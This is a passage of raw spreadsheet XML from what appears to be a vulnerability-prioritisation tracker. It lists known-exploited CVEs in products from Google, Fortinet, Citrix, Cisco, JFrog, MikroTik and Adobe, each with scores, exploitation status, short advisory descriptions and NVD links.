xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1559" r:id="rId1558" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1560" r:id="rId1559" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1561" r:id="rId1560" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1562" r:id="rId1561" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1563" r:id="rId1562" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1564" r:id="rId1563" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1565" r:id="rId1564" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1566" r:id="rId1565" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1567" r:id="rId1566" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1568" r:id="rId1567" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1569" r:id="rId1568" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1570" r:id="rId1569" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1571" r:id="rId1570" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1572" r:id="rId1571" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1573" r:id="rId1572" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1574" r:id="rId1573" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1575" r:id="rId1574" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1576" r:id="rId1575" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1577" r:id="rId1576" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1578" r:id="rId1577" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1579" r:id="rId1578" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1580" r:id="rId1579" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1581" r:id="rId1580" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1582" r:id="rId1581" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1583" r:id="rId1582" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1584" r:id="rId1583" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1585" r:id="rId1584" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1586" r:id="rId1585" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1587" r:id="rId1586" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1588" r:id="rId1587" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1589" r:id="rId1588" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1590" r:id="rId1589" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1591" r:id="rId1590" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1592" r:id="rId1591" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1593" r:id="rId1592" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1594" r:id="rId1593" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1595" r:id="rId1594" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1596" r:id="rId1595" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1597" r:id="rId1596" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1598" r:id="rId1597" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1599" r:id="rId1598" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1600" r:id="rId1599" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1601" r:id="rId1600" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1602" r:id="rId1601" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1603" r:id="rId1602" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1604" r:id="rId1603" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1605" r:id="rId1604" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1606" r:id="rId1605" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1607" r:id="rId1606" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1608" r:id="rId1607" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1609" r:id="rId1608" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1610" r:id="rId1609" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1611" r:id="rId1610" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1612" r:id="rId1611" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1613" r:id="rId1612" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1614" r:id="rId1613" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1615" r:id="rId1614" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1616" r:id="rId1615" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1617" r:id="rId1616" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1618" r:id="rId1617" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1619" r:id="rId1618" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1620" r:id="rId1619" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1621" r:id="rId1620" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1622" r:id="rId1621" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1623" r:id="rId1622" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1624" r:id="rId1623" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1625" r:id="rId1624" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1626" r:id="rId1625" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1627" r:id="rId1626" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1628" r:id="rId1627" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1629" r:id="rId1628" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1630" r:id="rId1629" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1631" r:id="rId1630" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1632" r:id="rId1631" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1633" r:id="rId1632" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1634" r:id="rId1633" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1635" r:id="rId1634" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1636" r:id="rId1635" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1637" r:id="rId1636" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1638" r:id="rId1637" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1639" r:id="rId1638" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1640" r:id="rId1639" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1641" r:id="rId1640" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1642" r:id="rId1641" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1643" r:id="rId1642" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1644" r:id="rId1643" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1645" r:id="rId1644" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1646" r:id="rId1645" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1647" r:id="rId1646" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1648" r:id="rId1647" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1649" r:id="rId1648" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1650" r:id="rId1649" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1651" r:id="rId1650" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1652" r:id="rId1651" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1653" r:id="rId1652" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1654" r:id="rId1653" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1655" r:id="rId1654" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1656" r:id="rId1655" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1657" r:id="rId1656" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1658" r:id="rId1657" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1659" r:id="rId1658" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1660" r:id="rId1659" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1661" r:id="rId1660" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1662" r:id="rId1661" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1663" r:id="rId1662" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1664" r:id="rId1663" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1665" r:id="rId1664" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1666" r:id="rId1665" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1667" r:id="rId1666" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1668" r:id="rId1667" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1669" r:id="rId1668" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1670" r:id="rId1669" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1671" r:id="rId1670" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1672" r:id="rId1671" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1673" r:id="rId1672" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1674" r:id="rId1673" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1675" r:id="rId1674" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1676" r:id="rId1675" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1677" r:id="rId1676" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1678" r:id="rId1677" /><hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="T1679" r:id="rId1678" /></hyperlinks><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CVE-2026-58704</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr"/>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr"/>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr"/>
      <c r="S3" s="5"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T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr"/>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr"/>
      <c r="F5" s="5" t="inlineStr"/>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S5"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T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6"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T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr"/>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce and magento</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr"/>
